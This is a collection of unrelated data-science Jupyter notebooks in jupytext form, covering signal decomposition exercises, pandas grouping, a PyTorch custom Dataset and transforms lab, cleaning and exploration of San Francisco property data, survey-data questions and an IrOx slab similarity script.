x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
numpy array: Returns a matrix of size x.shape[1] by x.shape[1] where each row represents
the step decomposition of the n-th sample.
"""
step_decomposition = None
return step_decomposition
def even_odd(x):
"""
Function that calculates the even/odd decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
x_E (numpy array): Array representing the even decomposition of signal x
x_O (numpy array): Array representing the odd decomposition of signal x
"""
x_E = None
x_O = None
return x_E, x_O
def interlaced(x):
"""
Function that calculates the interlaced decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
x_E (numpy array): Array representing the even-interlaced decomposition of signal x
x_O (numpy array): Array representing the odd-interlaced decomposition of signal x
"""
x_E = None
x_O = None
return x_E, x_O
# -
# ## Test Cases
# +
import pickle
# open a file, where you stored the pickled data
file = open('solution_common_decompositions.pkl', 'rb')
# dump information to that file
solution = pickle.load(file)
# close the file
file.close()
# +
np.random.seed(1)
x1 = np.random.rand(1,200)
x_impulse = impulse(x1)
assert(np.array_equal(x_impulse, solution['X1']['x_impulse'])), 'error in impulse function'
x_step = step(x1)
assert(np.array_equal(x_step, solution['X1']['x_step'])), 'error in step function'
x_E, x_O = even_odd(x1)
assert(np.array_equal(x_E, solution['X1']['x_E'])), 'error in even/odd decomposition function'
assert(np.array_equal(x_O, solution['X1']['x_O'])), 'error in even/odd decomposition function'
x_iE, x_iO = interlaced(x1)
assert(np.array_equal(x_iE, solution['X1']['x_iE'])), 'error in interlaced decomposition function'
assert(np.array_equal(x_iO, solution['X1']['x_iO'])), 'error in interlaced decomposition function'
# +
np.random.seed(1)
x2 = np.random.rand(1,201)
x_impulse = impulse(x2)
assert(np.array_equal(x_impulse, solution['X2']['x_impulse'])), 'error in impulse function'
x_step = step(x2)
assert(np.array_equal(x_step, solution['X2']['x_step'])), 'error in step function'
x_E, x_O = even_odd(x2)
assert(np.array_equal(x_E, solution['X2']['x_E'])), 'error in even/odd decomposition function'
assert(np.array_equal(x_O, solution['X2']['x_O'])), 'error in even/odd decomposition function'
x_iE, x_iO = interlaced(x2)
assert(np.array_equal(x_iE, solution['X2']['x_iE'])), 'error in interlaced decomposition function'
assert(np.array_equal(x_iO, solution['X2']['x_iO'])), 'error in interlaced decomposition function'
# -
05_Decompositions/Student/Common Decompositions.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from importlib import *
import shiroin
reload(shiroin)
from IPython.display import Latex
from shiroindev import *
from sympy import *
shiro.display=lambda x:display(Latex(x))
prove('2*(a^2+b^2+c^2-a*b-a*c-b*c)')
ineqs2
x=S("a^2+b^2+c^2")
latex(latex(x))
playground.ipynb
# ---
# title: "Grouping Rows In pandas"
# author: "<NAME>"
# date: 2017-12-20T11:53:49-07:00
# description: "Grouping Rows In pandas."
# type: technical_note
# draft: false
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Import modules
import pandas as pd
# Example dataframe
raw_data = {'regiment': ['Nighthawks', 'Nighthawks', 'Nighthawks', 'Nighthawks', 'Dragoons', 'Dragoons', 'Dragoons', 'Dragoons', 'Scouts', 'Scouts', 'Scouts', 'Scouts'],
'company': ['1st', '1st', '2nd', '2nd', '1st', '1st', '2nd', '2nd','1st', '1st', '2nd', '2nd'],
'name': ['Miller', 'Jacobson', 'Ali', 'Milner', 'Cooze', 'Jacon', 'Ryaner', 'Sone', 'Sloan', 'Piger', 'Riani', 'Ali'],
'preTestScore': [4, 24, 31, 2, 3, 4, 24, 31, 2, 3, 2, 3],
'postTestScore': [25, 94, 57, 62, 70, 25, 94, 57, 62, 70, 62, 70]}
df = pd.DataFrame(raw_data, columns = ['regiment', 'company', 'name', 'preTestScore', 'postTestScore'])
df
# Create a grouping object. In other words, create an object that
# represents that particular grouping. In this case we group
# pre-test scores by the regiment.
regiment_preScore = df['preTestScore'].groupby(df['regiment'])
# Display the mean value of each regiment's pre-test score
regiment_preScore.mean()
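# Grouping is not limited to a single key. As a sketch (on a small hypothetical frame with the same columns), several keys and several aggregations can be combined in one pass:

```python
import pandas as pd

# Small hypothetical frame mirroring the columns used above
scores = pd.DataFrame({
    'regiment': ['Nighthawks', 'Nighthawks', 'Dragoons', 'Dragoons'],
    'company':  ['1st', '2nd', '1st', '2nd'],
    'preTestScore': [4, 31, 3, 24],
})

# Group by two keys at once and compute several statistics in one pass
print(scores.groupby(['regiment', 'company'])['preTestScore'].agg(['mean', 'max']))
```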
docs/python/data_wrangling/pandas_group_rows_by.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <center>
# <img src="https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DL0110EN-SkillsNetwork/Template/module%201/images/IDSNlogo.png" width="300" alt="cognitiveclass.ai logo" />
# </center>
#
# <h1>Simple Dataset</h1>
#
# <h2>Objective</h2><ul><li> How to create a dataset in pytorch.</li><li> How to perform transformations on the dataset.</li></ul>
#
# <h2>Table of Contents</h2>
#
# <p>In this lab, you will construct a basic dataset by using PyTorch and learn how to apply basic transformations to it.</p>
# <ul>
# <li><a href="#Simple_Dataset">Simple dataset</a></li>
# <li><a href="#Transforms">Transforms</a></li>
# <li><a href="#Compose">Compose</a></li>
# </ul>
# <p>Estimated Time Needed: <strong>30 min</strong></p>
# <hr>
#
# <h2>Preparation</h2>
#
# The following are the libraries we are going to use for this lab. The <code>torch.manual_seed()</code> call forces the random number generator to produce the same values every time the notebook is rerun.
#
# +
# These are the libraries will be used for this lab.
import torch
from torch.utils.data import Dataset
torch.manual_seed(1)
# -
# <!--Empty Space for separating topics-->
#
# <h2 id="Simple_Dataset">Simple dataset</h2>
#
# Let us try to create our own dataset class.
#
# +
# Define class for dataset
class toy_set(Dataset):
    # Constructor with default values
def __init__(self, length = 100, transform = None):
self.len = length
self.x = 2 * torch.ones(length, 2)
self.y = torch.ones(length, 1)
self.transform = transform
# Getter
def __getitem__(self, index):
sample = self.x[index], self.y[index]
if self.transform:
sample = self.transform(sample)
return sample
# Get Length
def __len__(self):
return self.len
# -
# Now, let us create our <code>toy_set</code> object, and find out the value at index 0 and the length of the initial dataset
#
# +
# Create Dataset Object. Find out the value on index 1. Find out the length of Dataset Object.
our_dataset = toy_set()
print("Our toy_set object: ", our_dataset)
print("Value on index 0 of our toy_set object: ", our_dataset[0])
print("Our toy_set length: ", len(our_dataset))
# -
# As a result, we can apply the same indexing convention as a <code>list</code>,
# and apply the function <code>len</code> on the <code>toy_set</code> object. We are able to customize the indexing and length methods via <code>def __getitem__(self, index)</code> and <code>def __len__(self)</code>.
#
# Now, let us print out the first 3 elements and assign them to x and y:
#
# +
# Use loop to print out first 3 elements in dataset
for i in range(3):
x, y=our_dataset[i]
print("index: ", i, '; x:', x, '; y:', y)
# -
# The dataset object is iterable; as a result, we can apply a loop directly on the dataset object.
#
for x,y in our_dataset:
print(' x:', x, 'y:', y)
# <!--Empty Space for separating topics-->
#
# <h3>Practice</h3>
#
# Try to create an <code>toy_set</code> object with length <b>50</b>. Print out the length of your object.
#
# +
# Practice: Create a new object with length 50, and print the length of object out.
# Type your code here
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# my_dataset = toy_set(length = 50)
# print("My toy_set length: ", len(my_dataset))
# -->
#
# <!--Empty Space for separating topics-->
#
# <h2 id="Transforms">Transforms</h2>
#
# You can also create a class for transforming the data. In this case, we will try to add 1 to x and multiply y by 2:
#
# +
# Create tranform class add_mult
class add_mult(object):
# Constructor
def __init__(self, addx = 1, muly = 2):
self.addx = addx
self.muly = muly
# Executor
def __call__(self, sample):
x = sample[0]
y = sample[1]
x = x + self.addx
y = y * self.muly
sample = x, y
return sample
# -
# <!--Empty Space for separating topics-->
#
# Now, create a transform object:
#
# +
# Create an add_mult transform object, and an toy_set object
a_m = add_mult()
data_set = toy_set()
# -
# Assign the outputs of the original dataset to <code>x</code> and <code>y</code>. Then, apply the transform <code>add_mult</code> to the dataset and output the values as <code>x_</code> and <code>y_</code>, respectively:
#
# +
# Use loop to print out first 10 elements in dataset
for i in range(10):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = a_m(data_set[i])
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# As a result, 1 has been added to <code>x</code> and <code>y</code> has been multiplied by 2, as <i>[2, 2] + 1 = [3, 3]</i> and <i>[1] x 2 = [2]</i>
#
# <!--Empty Space for separating topics-->
#
# We can apply the transform object every time we create a new <code>toy_set</code> object. Remember, we have the constructor in the toy_set class with the parameter <code>transform = None</code>.
# When we create a new object using the constructor, we can assign the transform object to the parameter transform, as the following code demonstrates.
#
# +
# Create a new data_set object with add_mult object as transform
cust_data_set = toy_set(transform = a_m)
# -
# This applies the <code>a_m</code> object (a transform method) to every element in <code>cust_data_set</code> as it is accessed. Let us print out the first 10 elements in <code>cust_data_set</code> in order to see whether <code>a_m</code> was applied.
#
# +
# Use loop to print out first 10 elements in dataset
for i in range(10):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = cust_data_set[i]
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# The result is the same as the previous method.
#
# <!--Empty Space for separating topics-->
#
# +
# Practice: Construct your own my_add_mult transform. Apply my_add_mult on a new toy_set object. Print out the first three elements from the transformed dataset.
# Type your code here.
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# class my_add_mult(object):
# def __init__(self, add = 2, mul = 10):
# self.add=add
# self.mul=mul
#
# def __call__(self, sample):
# x = sample[0]
# y = sample[1]
# x = x + self.add
# y = y + self.add
# x = x * self.mul
# y = y * self.mul
# sample = x, y
# return sample
#
#
# my_dataset = toy_set(transform = my_add_mult())
# for i in range(3):
# x_, y_ = my_dataset[i]
# print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
#
# -->
#
# <!--Empty Space for separating topics-->
#
# <h2 id="Compose">Compose</h2>
#
# You can compose multiple transforms on the dataset object. First, import <code>transforms</code> from <code>torchvision</code>:
#
# +
# Run the command below when you do not have torchvision installed
# # !conda install -y torchvision
from torchvision import transforms
# -
# Then, create a new transform class that multiplies each of the elements by 100:
#
# +
# Create tranform class mult
class mult(object):
# Constructor
def __init__(self, mult = 100):
self.mult = mult
# Executor
def __call__(self, sample):
x = sample[0]
y = sample[1]
x = x * self.mult
y = y * self.mult
sample = x, y
return sample
# -
# Now let us try to combine the transforms <code>add_mult</code> and <code>mult</code>
#
# +
# Combine the add_mult() and mult()
data_transform = transforms.Compose([add_mult(), mult()])
print("The combination of transforms (Compose): ", data_transform)
# -
# The new <code>Compose</code> object will perform each transform sequentially, in the order listed, as shown in this figure:
#
# <img src="https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/DL0110EN/notebook_images%20/chapter%201/1.3.1_trasform.png" width="500" alt="Compose PyTorch">
#
data_transform(data_set[0])
# +
x,y=data_set[0]
x_,y_=data_transform(data_set[0])
print( 'Original x: ', x, 'Original y: ', y)
print( 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# Now we can pass the new <code>Compose</code> object (The combination of methods <code>add_mult()</code> and <code>mult</code>) to the constructor for creating <code>toy_set</code> object.
#
# +
# Create a new toy_set object with compose object as transform
compose_data_set = toy_set(transform = data_transform)
# -
# Let us print out the first 3 elements in different <code>toy_set</code> datasets in order to compare the output after different transforms have been applied:
#
# +
# Use loop to print out first 3 elements in dataset
for i in range(3):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = cust_data_set[i]
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
x_co, y_co = compose_data_set[i]
print('Index: ', i, 'Compose Transformed x_co: ', x_co ,'Compose Transformed y_co: ',y_co)
# -
# Let us see what happened on index 0. The original value of <code>x</code> is <i>[2, 2]</i>, and the original value of <code>y</code> is <i>[1]</i>. If we only applied <code>add_mult()</code> on the original dataset, then <code>x</code> became <i>[3, 3]</i> and <code>y</code> became <i>[2]</i>. Now let us see the values after applying both <code>add_mult()</code> and <code>mult()</code>. The result of <code>x</code> is <i>[300, 300]</i> and <code>y</code> is <i>[200]</i>. The calculation equivalent to the compose is <i>x = ([2, 2] + 1) x 100 = [300, 300], y = ([1] x 2) x 100 = [200]</i>
#
# <h3>Practice</h3>
#
# Try to combine the <code>mult()</code> and <code>add_mult()</code> as <code>mult()</code> to be executed first. And apply this on a new <code>toy_set</code> dataset. Print out the first 3 elements in the transformed dataset.
#
# +
# Practice: Make a compose as mult() execute first and then add_mult(). Apply the compose on toy_set dataset. Print out the first 3 elements in the transformed dataset.
# Type your code here.
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# my_compose = transforms.Compose([mult(), add_mult()])
# my_transformed_dataset = toy_set(transform = my_compose)
# for i in range(3):
# x_, y_ = my_transformed_dataset[i]
# print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -->
#
# <a href="https://dataplatform.cloud.ibm.com/registration/stepone?context=cpdaas&apps=data_science_experience,watson_machine_learning"><img src="https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DL0110EN-SkillsNetwork/Template/module%201/images/Watson_Studio.png"/></a>
#
# <h2>About the Authors:</h2>
#
# <a href="https://www.linkedin.com/in/joseph-s-50398b136/"><NAME></a> has a PhD in Electrical Engineering, his research focused on using machine learning, signal processing, and computer vision to determine how videos impact human cognition. Joseph has been working for IBM since he completed his PhD.
#
# Other contributors: <a href="https://www.linkedin.com/in/michelleccarey/"><NAME></a>, <a href="www.linkedin.com/in/jiahui-mavis-zhou-a4537814a"><NAME></a>
#
# ## Change Log
#
# | Date (YYYY-MM-DD) | Version | Changed By | Change Description |
# | ----------------- | ------- | ---------- | ----------------------------------------------------------- |
# | 2020-09-21 | 2.0 | Shubham | Migrated Lab to Markdown and added to course repo in GitLab |
#
# <hr>
#
# ## <h3 align="center"> © IBM Corporation 2020. All rights reserved. <h3/>
#
04-simple_data_set_v2.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## DATA CLEANING AND EDA 1
# +
# import required packages
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# %config InlineBackend.figure_format = 'svg'
plt.style.use("seaborn")
# -
df = pd.read_pickle("project2_data/SFproperty_df")
df.info()
# ### Check the dataset: <br> (1) Convert data to appropriate types <br> (2) Check out records that don't seem to make sense
# check for duplicates (2 of them) and drop the record with less info
df["Address"].duplicated().sum()
df[df["Address"].duplicated()]
print(df[df["Address"] == "2031 Hayes St"])
df.drop_duplicates(subset = ["Address"], inplace = True)
# check after duplicate removal
df.groupby(["Address", "Zip Code"])["Address"].count().sort_values(ascending = False).head()
# +
# removing symbols in house Price
df["Price"] = ["".join(p.strip("$").split(",")) for p in df["Price"]]
# convert Price to numbers and check for missing values
df["Price"] = pd.to_numeric(df["Price"])
# -
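# An equivalent pandas-native sketch (on hypothetical values in the same format) avoids the Python-level loop: strip the symbols with vectorized string methods, then convert in one step.

```python
import pandas as pd

# Hypothetical price strings in the same format as the scraped data
prices = pd.Series(['$1,200,000', '$850,000'])
cleaned = pd.to_numeric(prices.str.replace('$', '', regex=False)
                              .str.replace(',', '', regex=False))
print(cleaned.tolist())  # [1200000, 850000]
```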
# look at property price distribution (Note: distribution is right skewed)
# plt.rcParams["figure.figsize"] = [5,3]
# plt.rcParams["figure.dpi"] = 200
plt.hist(df["Price"], bins = 100)
plt.title("SF Property Price Distribution from 2020 to 2021", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Property Price in USD", fontsize = 12);
#plt.savefig("project2_images/histogram_property_price.png");
# +
# # seaborn histogram, with density curve
# sns.set_style("darkgrid")
# price_hist = sns.histplot(df["Price"], bins=100, kde=True)
# price_hist.set(xlabel="Number of Property", ylabel="Property Price in USD")
# plt.title("SF Property Price Distribution from 2020 to 2021", fontsize=15);
# +
# check outliers: how should outliers be defined?
# houses costing > $5M don't seem particularly out of the ordinary, since their sizes are huge
print(df["Price"].describe())
print(len(df[df["Price"] > 5000000]))
print(len(df[df["Price"] < 500000]))
# df[df["Price"] > 5000000].sort_values("Price", ascending = False)
# to make notebook display less cluttered
df[df["Price"] > 5000000].sort_values("Price", ascending = False).head()
# +
# df[df["Price"] < 500000].sort_values("Price")
# to make notebook display less cluttered
df[df["Price"] < 500000].sort_values("Price").head()
# -
# NOTES: Could try removing properties > 10mil and <200k in later analysis
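# One common way to formalize the outlier question above is the 1.5×IQR rule; a toy sketch with made-up prices (not the actual data), just to illustrate the fences:

```python
from statistics import quantiles

# Toy price list (made up), not the actual dataset
prices = [300_000, 750_000, 900_000, 1_200_000, 1_500_000, 2_000_000, 12_000_000]
q1, _, q3 = quantiles(prices, n=4)        # quartiles (exclusive method)
iqr = q3 - q1
lower, upper = q1 - 1.5 * iqr, q3 + 1.5 * iqr
outliers = [p for p in prices if p < lower or p > upper]
print(outliers)  # only the $12M listing falls outside the fences
```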
# drop a record with Price misrecorded (much higher price listed in other websites)
df.drop(df[df["Price"] == 27000].index, inplace = True)
# +
# apply log transformation to price(now approximately normal)
log_Price = np.log(df["Price"])
plt.hist(log_Price, bins = 100)
plt.title("Distribution of Property Price from 2020 to 2021 in Log Scale", fontsize = 13)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Property Price in Log Scale", fontsize = 12)
plt.tight_layout();
#plt.savefig("project2_images/histogram_LOG_property_price.png");
# -
# check missing values in Location
# print(len(df[df["Location"] == "—"]))
print(len(df[df["Location"] == ""]))
#191 missing values for location, but Zip Code can be used to approximate location!
# +
# check missing values in Beds and Baths
# print(len(df[df["Beds"] == ""]))
print(len(df[df["Beds"] == "—"])) #124 obs missing values in Beds
# print(len(df[df["Baths"] == ""]))
print(len(df[df["Baths"] == "—"])) #118 obs missing values in Baths
mask = (df["Beds"] == "—") & (df["Baths"] == "—")
print(len(df[mask])) #42 obs missing both Beds and Baths
# replace "—" in both Beds and Baths with none
df["Beds"].replace({"—":None}, inplace = True)
df["Baths"].replace({"—":None}, inplace = True)
# -
# convert Beds to integer and Baths to float
# int vs float makes a difference in interpretation
df["Beds"] = pd.to_numeric(df["Beds"]).astype("Int64")
df["Baths"] = pd.to_numeric(df["Baths"])
df[["Beds","Baths"]].describe()
df["Beds"].value_counts().sort_index()
df[df["Beds"] == 0] # properties that have no bedroom in the dataset are condos
df["Baths"].value_counts().sort_index() #there can be 0.25 and 0.75 baths...o.O
# Note: it makes sense to have 0 beds (studio units), but a property should always have >= 1 bath
# +
# look at distribution of property by number of bedrooms
Beds_noNA = df[df["Beds"].notnull()]["Beds"]
plt.hist(Beds_noNA, bins = 30)
plt.title("Property Distribution by Number of Beds", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Number of Beds", fontsize = 12);
# +
# check missing values in house size(Sq.Ft.)
# print(len(df[df["Sq.Ft."] == ""]))
print(len(df[df["Sq.Ft."] == "—"])) #269 obs missing values in size
# removing symbols in house size(Sq.Ft.) and replacing "—" with null
df["Sq.Ft."] = ["".join(s.split(",")) for s in df["Sq.Ft."]]
df["Sq.Ft."].replace({"—":None}, inplace = True)
# -
# convert size to numeric
df["Sq.Ft."] = pd.to_numeric(df["Sq.Ft."])
# df["Sq.Ft."].isna().sum()
# look at distribution of property by size
plt.hist(df["Sq.Ft."], bins = 30)
plt.title("Property Distribution by Size", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Size of Properties", fontsize = 12);
# check outliers in property size
df["Sq.Ft."].describe()
df[df["Sq.Ft."] == 0] #2 listings have size 0, redfin records reported by owners
# remove the two records with 0 size
mask = (df["Sq.Ft."] == 0)
df.drop(df[mask].index, inplace = True)
# +
# df[df["Sq.Ft."] > 10000]
# to make notebook display less cluttered
df[df["Sq.Ft."] > 10000].head()
# -
# size has right skewed distribution, log transform (approximately normal after transformation)
plt.hist(np.log(df["Sq.Ft."]), bins = 30)
plt.title("Property Size Distribution in Log Scale", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Log Size of Properties", fontsize = 12);
# +
# check missing values in HOA
# print(len(df[df["HOA"] == "—"]))
print(len(df[df["HOA"] == ""])) #13 missing value in HOA
df["HOA"].value_counts()
# turn HOA into numeric
df["HOA"] = ["".join(h.split("/")[0].strip("$").split(",")) for h in df["HOA"]]
df["HOA"].replace({"None":"0"}, inplace = True)
df["HOA"] = pd.to_numeric(df["HOA"])
#df["HOA"].value_counts()
# +
# check missing values in Year Built
# print(len(df[df["Year Built"] == ""]))
print(len(df[df["Year Built"] == "—"])) #48 missing values in Year Built
df["Year Built"].replace({"—":None}, inplace = True)
# convert Year Built to integers
df["Year Built"] = pd.to_numeric(df["Year Built"]).astype("Int64")
df["Year Built"].value_counts().sort_index(ascending = False)
df["Year Built"].isna().sum()
# -
# look at distribution of Year Built
YB_noNA = df[df["Year Built"].notnull()]["Year Built"]
plt.hist(YB_noNA, bins = 100)
plt.title("Property Distribution by Year Built", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Year Built", fontsize = 12);
# check missing values in Lot Size and Date Sold
# print(len(df[df["Lot Size"] == ""]))
print(len(df[df["Lot Size"] == "—"])) #503 missing values in LotSize, likely to be missing for condos
# +
# convert Date Sold to datetime object
df["Date Sold"] = pd.to_datetime(df["Date Sold"])
df["Date Sold"].value_counts().sort_index()
print(df["Date Sold"].value_counts())
print(len(df[df["Date Sold"] == "—"]))
print(len(df[df["Date Sold"] == ""])) #0 missing values in Date Sold, should divide in month and year
# -
# extract the year and month from Date Sold
df["year_sold"] = pd.DatetimeIndex(df["Date Sold"]).year
df["month_sold"] = pd.DatetimeIndex(df["Date Sold"]).month
df["month_sold"].value_counts()
# +
# number of properties sold in Jan 2020/2021
mask = (df["year_sold"] == 2020) & (df["month_sold"] == 1)
print(len(df[mask]))
mask = (df["year_sold"] == 2021) & (df["month_sold"] == 1)
print(len(df[mask]))
# +
# check missing values in Zip Code
print(len(df[df["Zip Code"] == "—"]))
print(len(df[df["Zip Code"] == ""])) #0 missing values in Zip Code, need to extract Zip Code from of the string
#extrac zip code from the string
df["Zip Code"] = [zip.split("-")[-1] for zip in df["Zip Code"]]
df["Zip Code"].value_counts()
# -
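# A standalone check of the extraction above, assuming the scraped field looks something like the hypothetical string below:

```python
# Hypothetical raw field; splitting on "-" and taking the last part keeps the zip code
raw = "San Francisco, CA-94110"
zip_code = raw.split("-")[-1]
print(zip_code)  # "94110"
```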
# one zip code (one listing) maps to Daly City, delete record
df.drop(df[df["Zip Code"] == "94014"].index, inplace = True)
df["prop_type"].value_counts()
df.info()
df.to_pickle("/Users/sarazzzz/Desktop/Metis/CAMP/Metis_project2/project2_data/prop_cleaned_r1")
|
MetisP2_cleaning_EDA1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#
#
#
#
#
#
#
# <h2 id='part1'>A Look at the Data</h2>
#
# In order to get a better understanding of the data we will be looking at throughout this lesson, let's take a look at some of the characteristics of the dataset.
#
# First, let's read in the data and necessary libraries.
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import ALookAtTheData as t
# %matplotlib inline
df = pd.read_csv('./survey_results_public.csv')
df.head()
# -
# As you work through the notebook(s) in this and future parts of this program, you will see some consistency in how to test your solutions to ensure they match what we achieved! In every environment, there is a solution file and a test file. There will be checks for each solution built into each notebook, but if you get stuck, you may also open the solution notebook to see how we find any of the solutions. Let's take a look at an example.
#
# <h3 id='q1'>Question 1</h3>
#
# **1.** Provide the number of rows and columns in this dataset.
# +
# We solved this one for you by providing the number of rows and columns:
# You can see how we are prompted that we solved for the number of rows and cols correctly!
num_rows = df.shape[0] #Provide the number of rows in the dataset
num_cols = df.shape[1] #Provide the number of columns in the dataset
t.check_rows_cols(num_rows, num_cols)
# +
# If we made a mistake - a different prompt will appear
flipped_num_rows = df.shape[1] #Provide the number of rows in the dataset
flipped_num_cols = df.shape[0] #Provide the number of columns in the dataset
t.check_rows_cols(flipped_num_rows, flipped_num_cols)
# +
# If you want to know more about what the test function is expecting,
# you can read the documentation the same way as any other function
# t.check_rows_cols?
# -
# Now that you are familiar with how to test your code - let's have you answer your first question:
#
# ### Question 2
#
# **2.** Which columns had no missing values? Provide a set of column names that have no missing values.
# +
no_nulls = set(df.columns[df.isnull().mean()==0])#Provide a set of columns with 0 missing values.
t.no_null_cols(no_nulls)
# -
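# The `df.isnull().mean() == 0` trick works because the mean of a boolean missing-mask equals the fraction of missing entries; a pure-Python sketch of the same idea:

```python
# Toy column with two missing entries out of four
col = [1.0, None, 3.0, None]
missing_frac = sum(v is None for v in col) / len(col)
print(missing_frac)  # 0.5
```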
# ### Question 3
#
# **3.** Which columns have the most missing values? Provide a set of column names that have more than 75% of their values missing.
# +
most_missing_cols = set(df.columns[df.isnull().mean() > 0.75])#Provide a set of columns with more than 75% of the values missing
t.most_missing_cols(most_missing_cols)
# -
# ### Question 4
#
# **4.** Provide a pandas series of the different **Professional** status values in the dataset. Store this pandas series in **status_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each status.
# +
status_vals = df.Professional.value_counts()#Provide a pandas series of the counts for each Professional status
# The below should be a bar chart of the proportion of individuals in each professional category if your status_vals
# is set up correctly.
(status_vals/df.shape[0]).plot(kind="bar");
plt.title("What kind of developer are you?");
# -
# ### Question 5
#
# **5.** Provide a pandas series of the different **FormalEducation** status values in the dataset. Store this pandas series in **ed_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each status.
# +
ed_vals = df.FormalEducation.value_counts()#Provide a pandas series of the counts for each FormalEducation status
# The below should be a bar chart of the proportion of individuals in your ed_vals
# if it is set up correctly.
(ed_vals/df.shape[0]).plot(kind="bar");
plt.title("Formal Education");
# -
# ### Question 6
#
# **6.** Provide a pandas series of the different **Country** values in the dataset. Store this pandas series in **count_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each country.
# +
count_vals = df.Country.value_counts()#Provide a pandas series of the counts for each Country
# The below should be a bar chart of the proportion of the top 10 countries for the
# individuals in your count_vals if it is set up correctly.
(count_vals[:10]/df.shape[0]).plot(kind="bar");
plt.title("Country");
# -
# Feel free to explore the dataset further to gain additional familiarity with the columns and rows in the dataset. You will be working pretty closely with this dataset throughout this lesson.
pd.DataFrame(df.query("Professional == 'Professional developer' and (Gender == 'Male' or Gender == 'Female')").groupby(['Gender', 'FormalEducation']).mean()['Salary'])
|
Introduction to Data Science/A Look at the Data - Solution.ipynb
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:PROJ_irox_oer] *
# language: python
# name: conda-env-PROJ_irox_oer-py
# ---
# # Compute similarity of constructed *O IrOx slabs
# ---
# # Import Modules
# +
import os
print(os.getcwd())
import sys
import pickle
import numpy as np
import pandas as pd
# #########################################################
# from StructurePrototypeAnalysisPackage.ccf import struc2ccf
# from StructurePrototypeAnalysisPackage.ccf import struc2ccf, cal_ccf_d
from StructurePrototypeAnalysisPackage.ccf import cal_ccf_d
# #########################################################
from methods import get_df_slab
from methods import get_ccf
from methods import get_D_ij
from methods import get_identical_slabs
# #########################################################
# from local_methods import get_ccf
# from local_methods import get_D_ij
# from local_methods import get_identical_slabs
# -
# # Script Inputs
# +
verbose = True
r_cut_off = 10
r_vector = np.arange(1, 10, 0.02)
# -
# # Read Data
df_slab = get_df_slab()
# # TEMP | Filtering down `df_slab`
# +
# df_slab = df_slab[df_slab.bulk_id == "mjctxrx3zf"]
# df_slab = df_slab[df_slab.bulk_id == "64cg6j9any"]
# -
df_slab
df_slab = df_slab.sort_values(["bulk_id", "facet", ])
bulk_ids = [
"64cg6j9any",
"9573vicg7f",
"b19q9p6k72",
# "",
]
# df_slab = df_slab[
# df_slab.bulk_id.isin(bulk_ids)
# ]
# +
# assert False
# + active=""
#
#
# -
# # Looping through slabs and computing CCF
grouped = df_slab.groupby(["bulk_id"])
for bulk_id_i, group_i in grouped:
for slab_id_j, row_j in group_i.iterrows():
# #####################################################
slab_final_j = row_j.slab_final
# #####################################################
ccf_j = get_ccf(
slab_id=slab_id_j,
slab_final=slab_final_j,
r_cut_off=r_cut_off,
r_vector=r_vector,
verbose=False)
# # Constructing D_ij matrix
verbose_local = False
# #########################################################
data_dict_list = []
# #########################################################
grouped = df_slab.groupby(["bulk_id"])
for bulk_id_i, group_i in grouped:
# #####################################################
data_dict_i = dict()
# #####################################################
if verbose_local:
print("slab_id:", bulk_id_i)
D_ij = get_D_ij(group_i, slab_id=bulk_id_i)
ident_slab_pairs_i = get_identical_slabs(D_ij)
# print("ident_slab_pairs:", ident_slab_pairs_i)
ids_to_remove = []
for ident_pair_i in ident_slab_pairs_i:
# Checking if any id already added to `id_to_remove` is in a new pair
for i in ids_to_remove:
if i in ident_pair_i:
print("This case needs to be dealt with more carefully")
break
